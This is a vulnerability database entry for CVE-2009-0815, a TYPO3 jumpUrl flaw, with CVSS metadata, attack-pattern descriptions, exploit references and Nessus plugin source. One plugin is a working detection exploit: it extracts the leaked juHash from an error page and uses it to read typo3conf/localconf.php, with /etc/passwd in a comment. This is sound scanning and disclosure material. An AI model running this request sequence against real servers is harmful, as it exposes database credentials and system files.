Vulnerabilities > CVE-2009-0815 - Information Exposure vulnerability in Typo3

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
typo3
CWE-200
nessus
exploit available
metasploit

Summary

The jumpUrl mechanism in class.tslib_fe.php in TYPO3 3.3.x through 3.8.x, 4.0 before 4.0.12, 4.1 before 4.1.10, 4.2 before 4.2.6, and 4.3alpha1 leaks a hash secret (juHash) in an error message, which allows remote attackers to read arbitrary files by including the hash in a request.

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Subverting Environment Variable Values
    The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.
  • Footprinting
    An attacker engages in probing and exploration activity to identify constituents and properties of the target. Footprinting is a general term to describe a variety of information gathering techniques, often used by attackers in preparation for some attack. It consists of using tools to learn as much as possible about the composition, configuration, and security mechanisms of the targeted application, system or network. Information that might be collected during a footprinting effort could include open ports, applications and their versions, network topology, and similar information. While footprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.
  • Exploiting Trust in Client (aka Make the Client Invisible)
    An attack of this type exploits a programs' vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by placing themselves in the communication channel between client and server such that communication directly to the server is possible where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
  • Browser Fingerprinting
    An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.
  • Session Credential Falsification through Prediction
    This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.

Exploit-Db

descriptionTYPO3 < 4.0.12/4.1.10/4.2.6 (jumpUrl) Remote File Disclosure Exploit. CVE-2009-0815. Webapps exploit for php platform
idEDB-ID:8038
last seen2016-02-01
modified2009-02-10
published2009-02-10
reporterLolek
sourcehttps://www.exploit-db.com/download/8038/
titleTYPO3 < 4.0.12/4.1.10/4.2.6 jumpUrl Remote File Disclosure Exploit

Metasploit

descriptionThis module exploits a file disclosure vulnerability in the jumpUrl mechanism of Typo3. This flaw can be used to read any file that the web server user account has access to.
idMSF:AUXILIARY/ADMIN/HTTP/TYPO3_SA_2009_002
last seen2020-05-21
modified2020-05-12
published2009-03-15
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/typo3_sa_2009_002.rb
titleTypo3 sa-2009-002 File Disclosure

Nessus

  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-1720.NASL
    descriptionSeveral remote vulnerabilities have been discovered in the TYPO3 web content management framework. Marcus Krause and Michael Stucki from the TYPO3 security team discovered that the jumpUrl mechanism discloses secret hashes enabling a remote attacker to bypass access control by submitting the correct value as a URL parameter and thus being able to read the content of arbitrary files. Jelmer de Hen and Dmitry Dulepov discovered multiple cross-site scripting vulnerabilities in the backend user interface allowing remote attackers to inject arbitrary web script or HTML. As it is very likely that your encryption key has been exposed we strongly recommend to change your encryption key via the install tool after installing the update.
    last seen2020-06-01
    modified2020-06-02
    plugin id35638
    published2009-02-12
    reporterThis script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/35638
    titleDebian DSA-1720-1 : typo3-src - several vulnerabilities
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Debian Security Advisory DSA-1720. The text 
    # itself is copyright (C) Software in the Public Interest, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(35638);
      script_version("1.19");
      script_cvs_date("Date: 2019/08/02 13:32:21");
    
      script_cve_id("CVE-2009-0815", "CVE-2009-0816");
      script_xref(name:"DSA", value:"1720");
    
      script_name(english:"Debian DSA-1720-1 : typo3-src - several vulnerabilities");
      script_summary(english:"Checks dpkg output for the updated package");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Debian host is missing a security-related update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Several remote vulnerabilities have been discovered in the TYPO3 web
    content management framework.
    
    Marcus Krause and Michael Stucki from the TYPO3 security team
    discovered that the jumpUrl mechanism discloses secret hashes enabling
    a remote attacker to bypass access control by submitting the correct
    value as a URL parameter and thus being able to read the content of
    arbitrary files.
    
    Jelmer de Hen and Dmitry Dulepov discovered multiple cross-site
    scripting vulnerabilities in the backend user interface allowing
    remote attackers to inject arbitrary web script or HTML.
    
    As it is very likely that your encryption key has been exposed we
    strongly recommend to change your encryption key via the install tool
    after installing the update."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514713"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.debian.org/security/2009/dsa-1720"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "Upgrade the typo3 package.
    
    For the stable distribution (etch) these problems have been fixed in
    version 4.0.2+debian-8."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"d2_elliot_name", value:"Typo3 FD");
      script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
      script_cwe_id(79, 200);
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:typo3-src");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:4.0");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2009/03/04");
      script_set_attribute(attribute:"patch_publication_date", value:"2009/02/10");
      script_set_attribute(attribute:"plugin_publication_date", value:"2009/02/12");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Debian Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("debian_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
    if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    if (deb_check(release:"4.0", prefix:"typo3", reference:"4.0.2+debian-8")) flag++;
    if (deb_check(release:"4.0", prefix:"typo3-src-4.0", reference:"4.0.2+debian-8")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());
      else security_warning(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familyCGI abuses
    NASL idTYPO3_JUMPURL_INFO_DISCLOSURE.NASL
    descriptionThe
    last seen2020-06-01
    modified2020-06-02
    plugin id35655
    published2009-02-12
    reporterThis script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/35655
    titleTYPO3 'jumpUrl' Mechanism Information Disclosure
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(35655);
      script_version("1.22");
      script_cvs_date("Date: 2018/11/15 20:50:19");
    
      script_cve_id("CVE-2009-0815");
      script_bugtraq_id(33714);
      script_xref(name:"EDB-ID", value:"8038");
    
      script_name(english:"TYPO3 'jumpUrl' Mechanism Information Disclosure");
      script_summary(english:"Attempts to read 'typo3conf/localconf.php'.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote web server contains a PHP script that is affected by an
    information disclosure vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The 'jumpUrl' mechanism in the version of TYPO3 installed on the
    remote host, which is used to track access, exposes the value of a
    hash secret used to validate requests. An unauthenticated, remote
    attacker can leverage this issue to view the contents of arbitrary
    files on the remote host subject to the privileges of the web server
    user id.");
      # https://typo3.org/security/advisory/typo3-sa-2009-002/
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?6fdf4cd6");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to TYPO3 version 4.0.12 / 4.1.10 / 4.2.6 or later, or patch
    the installation as discussed in the project's advisory referenced
    above.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"false");
      script_set_attribute(attribute:"d2_elliot_name", value:"Typo3 FD");
      script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
    script_cwe_id(200);
    
      script_set_attribute(attribute:"plugin_publication_date", value:"2009/02/12");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:typo3:typo3");
      script_set_attribute(attribute:"exploited_by_nessus", value:"true");
      script_end_attributes();
    
      script_category(ACT_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("typo3_detect.nasl");
      script_require_keys("installed_sw/TYPO3","www/PHP");
      script_require_ports("Services/www", 80);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("install_func.inc");
    include("url_func.inc");
    include("data_protection.inc");
    
    app = "TYPO3";
    get_install_count(app_name:app, exit_if_zero:TRUE);
    
    port = get_http_port(default:80, php:TRUE);
    
    install = get_single_install(
      app_name : app,
      port     : port
    );
    dir = install['path'];
    install_url = build_url(qs:dir, port:port);
    
    # file = "/etc/passwd";
    # file_pat = "root:.*:0:[01]:";
    file = "typo3conf/localconf.php";
    file_pat = "\$typo_db_(password|username) *=";
    
    # Call up the registration page.
    url =
      "/?" +
      "jumpurl=" + urlencode(str:file) + "&" +
      "juSecure=1&" +
      "type=0&" +
      "locationData=" + urlencode(str:"3:");
    
    res = http_send_recv3(method:"GET", item:dir+url, port:port, exit_on_fail:TRUE);
    
    # Grab the hash.
    juhash = NULL;
    
    pat = "Calculated juHash, ([a-z0-9]+), did not";
    matches = egrep(pattern:pat, string:res[2]);
    if (matches)
    {
      foreach match (split(matches, keep:FALSE))
      {
        item = eregmatch(pattern:pat, string:match);
        if (!empty_or_null(item[1]))
        {
          juhash = item[1];
          break;
        }
      }
    }
    if (empty_or_null(juhash)) exit(0, "Unable to extract juHash from "+ install_url + url);
    
    # Now read the file.
    url2 = url + "&juHash=" + juhash;
    
    res2 = http_send_recv3(method:"GET", item:dir+url2, port:port, exit_on_fail:TRUE);
    
    # There's a problem if we see the expected contents.
    if (egrep(pattern:file_pat, string:res2[2]))
    {
      if (report_verbosity > 0)
      {
        res2[2] = data_protection::redact_etc_passwd(output:res2[2]);
        report =
          '\n' + 'Nessus was able to exploit the issue to retrieve the contents of' +
          '\n' + "'" + file + "'" + ' on the remote host using the following URLs :' +
          '\n' +
          '\n' + '  ' + install_url + url + 
          '\n' + '  ' + install_url + url2 + 
          '\n';
        if (report_verbosity > 1)
        {
          snip = crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30);
          report +=
            '\n' + 'Here are its contents :\n' +
            '\n' + snip +
            res2[2] + '\n' +
            snip;
        }
        security_warning(port:port, extra:report);
      }
      else security_warning(port);
    
      exit(0);
    }
    else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);
    
  • NASL familyFreeBSD Local Security Checks
    NASL idFREEBSD_PKG_CC47FAFEF82311DD94D90030843D3802.NASL
    descriptionSecunia reports : Some vulnerabilities have been reported in Typo3, which can be exploited by malicious people to conduct cross-site scripting attacks and disclose sensitive information. Input passed via unspecified fields to the backend user interface is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user
    last seen2020-06-01
    modified2020-06-02
    plugin id35641
    published2009-02-12
    reporterThis script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/35641
    titleFreeBSD : typo3 -- XSS and information disclosure (cc47fafe-f823-11dd-94d9-0030843d3802)